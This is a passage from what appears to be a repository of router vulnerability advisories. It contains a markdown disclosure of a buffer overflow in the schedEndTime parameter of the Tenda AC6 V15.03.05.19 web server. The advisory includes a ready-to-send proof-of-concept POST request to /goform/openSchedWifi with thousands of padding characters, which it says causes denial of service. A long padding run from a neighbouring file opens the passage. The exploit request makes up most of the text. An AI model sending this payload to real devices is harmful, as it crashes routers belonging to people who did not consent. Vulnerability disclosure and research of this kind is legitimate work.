AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```

![image-20221118151225120](images/03.png)
--------------------------------------------------------------------------------
/tenda_ac6/setSchedWifi_schedEndTime/setSchedWifi_schedEndTime.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the schedEndTime parameter in the setSchedWifi function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/openSchedWifi` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/openSchedWifi` page. The details are shown below:

![image-20221119104411836](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.204.133
Content-Length: 2082
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

schedWifiEnable=0&schedEndTime=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa